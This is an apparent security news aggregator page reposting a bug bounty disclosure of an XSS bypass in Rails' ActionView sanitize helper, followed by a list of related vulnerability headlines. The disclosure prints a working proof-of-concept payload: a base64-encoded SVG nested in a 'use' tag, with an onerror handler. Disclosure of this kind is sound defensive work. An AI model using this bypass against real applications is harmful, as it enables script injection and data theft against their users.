Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ Internet Bug Bounty: Rails ActionView sanitize helper bypass leading to XSS using SVG tag.

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š Internet Bug Bounty: Rails ActionView sanitize helper bypass leading to XSS using SVG tag.


๐Ÿ’ก Newskategorie: Sicherheitslรผcken
๐Ÿ”— Quelle: vulners.com


image
In the specific configuration, it was possible to bypass HTML sanitization by using the use tag of the SVG element. In the index.html.erb: ruby <%= sanitize "<svg><use href=\"data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEzMzcnIGhlaWdodD0nMTMzNyc+CjxpbWFnZSBocmVmPSIxIiBvbmVycm9yPSJhbGVydCh3aW5kb3cub3JpZ2luKSIgLz4KPC9zdmc+#x\"/></svg>", tags: %w(svg use) %> use tag allows to embed another base64 encoded SVG containing target XSS payload, base64 after decoding: svg <svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='1337' height='1337'> <image href="1" onerror="alert(window.origin)" /> </svg> SVG and use tags had to be allowed either in global configuration config.action_view.sanitized_allowed_tags = ['svg', 'use'] or inline with tags argument of the helper. Impact XSS could lead to data theft through the attackerโ€™s ability to manipulate data through their access to the application, and their ability to interact with other users, including performing other malicious attacks, which would appear to originate from a legitimate user. These malicious actions could also result in reputational damage for the business through the impact on customersโ€™... ...



๐Ÿ“Œ Internet Bug Bounty: Rails ActionView sanitize helper bypass leading to XSS using SVG tag.


๐Ÿ“ˆ 151.38 Punkte

๐Ÿ“Œ Internet Bug Bounty: CVE-2022-23519: Rails::Html::SafeListSanitizer vulnerable to XSS when certain tags are allowed (math+style || svg+style)


๐Ÿ“ˆ 53.99 Punkte

๐Ÿ“Œ Ruby on Rails up to 3.2.12 Sanitize Helper sanitizer.rb cross site scripting


๐Ÿ“ˆ 50.39 Punkte

๐Ÿ“Œ CVE-2015-7580 | Ruby on Rails 3.0/4.0 rails-html-sanitizer cross site scripting (XFDB-110103 / rails-cve20157580-xss)


๐Ÿ“ˆ 49.48 Punkte

๐Ÿ“Œ Internet Bug Bounty: Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag


๐Ÿ“ˆ 49.29 Punkte

๐Ÿ“Œ Internet Bug Bounty: CVE-2022-23520: Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)


๐Ÿ“ˆ 40.59 Punkte

๐Ÿ“Œ Artifex MuPDF 1.14.0 svg/svg-run.c fz_xml_att SVG File denial of service


๐Ÿ“ˆ 40.19 Punkte

๐Ÿ“Œ safe-svg SVG validator to prevent XSS


๐Ÿ“ˆ 34.41 Punkte

๐Ÿ“Œ Sanitize Gem up to 5.2.0 on Ruby SVG Element cross site scripting


๐Ÿ“ˆ 34.25 Punkte

๐Ÿ“Œ Internet Bug Bounty: [CVE-2023-23913] DOM Based Cross-site Scripting in rails-ujs for contenteditable HTML Elements


๐Ÿ“ˆ 32.98 Punkte

๐Ÿ“Œ Internet Bug Bounty: CVE-2022-21831: Possible code injection vulnerability in Rails / Active Storage


๐Ÿ“ˆ 32.98 Punkte

๐Ÿ“Œ Internet Bug Bounty: ReDoS (Rails::Html::PermitScrubber.scrub_attribute)


๐Ÿ“ˆ 32.98 Punkte

๐Ÿ“Œ NVIDIA GeForce Experience Web Helper Helper.exe privilege escalation


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ hide.me up to 2.4.3 on macOS Helper Tool me_hide_vpnhelper.Helper privilege escalation


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ A Detailed Explanation on Radio Button Helper and CheckBox Helper in MVC


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ NVIDIA GeForce Experience Web Helper Helper.exe erweiterte Rechte


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ DD-CLI-HELPER and VBOXMANAGE-CLI-HELPER


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ Bn-Uefi-Helper - Helper Plugin For Analyzing UEFI Firmware


๐Ÿ“ˆ 31.16 Punkte

๐Ÿ“Œ XSS-LOADER - XSS Payload Generator / XSS Scanner / XSS Dork Finder


๐Ÿ“ˆ 30.47 Punkte

๐Ÿ“Œ Ruby on Rails up to 3.2.7 http_authentication.rb with_http_digest helper improper authentication


๐Ÿ“ˆ 29.53 Punkte

๐Ÿ“Œ Ruby on Rails 3.0.16/3.1.7/3.2.7 Helper Method select_tag cross site scripting


๐Ÿ“ˆ 29.53 Punkte

๐Ÿ“Œ Ruby on Rails up to 3.1.x Serialize Helper privileges management


๐Ÿ“ˆ 29.53 Punkte

๐Ÿ“Œ David Heinemeier Hansson Ruby on Rails 4.0.0/4.0.1 simple_format helper some_text cross site scripting


๐Ÿ“ˆ 29.53 Punkte

๐Ÿ“Œ Bypass Privacy - Fake Notification & Tag Non-Friends (Bug Bounty Facebook)


๐Ÿ“ˆ 29.32 Punkte

๐Ÿ“Œ [Bug Bounty Hacker] Yahoo Bug Bounty Program 2016 - Sender Spoofing Vulnerability


๐Ÿ“ˆ 28.48 Punkte

๐Ÿ“Œ Ebay Inc Bug Bounty Magento Commerce Bug Bounty - Persistent Cross Site Scripting Vulnerability


๐Ÿ“ˆ 28.48 Punkte

๐Ÿ“Œ Naked Security Live โ€“ When is a bug bounty not a bug bounty?


๐Ÿ“ˆ 28.48 Punkte

๐Ÿ“Œ Bug Bounty Field Manual: The Definitive Guide for Planning, Launching, and Operating a Successful Bug Bounty Program


๐Ÿ“ˆ 28.48 Punkte

๐Ÿ“Œ Bug Bounty Field Manual: The Definitive Guide for Planning, Launching, and Operating a Successful Bug Bounty Program


๐Ÿ“ˆ 28.48 Punkte

๐Ÿ“Œ Bug Bounty Platforms [Best Choices For a Bug Bounty Program]


๐Ÿ“ˆ 28.48 Punkte

๐Ÿ“Œ Bug Bounty Benefits | Why You Need a Bug Bounty Program


๐Ÿ“ˆ 28.48 Punkte

๐Ÿ“Œ Fear and hacking on the bug bounty trail: write up of Atlassian's first (Bugcrowd) Bug Bounty event in Sydney


๐Ÿ“ˆ 28.48 Punkte

๐Ÿ“Œ Sanitize $handle in the admin log page to prevent XSS


๐Ÿ“ˆ 28.47 Punkte











matomo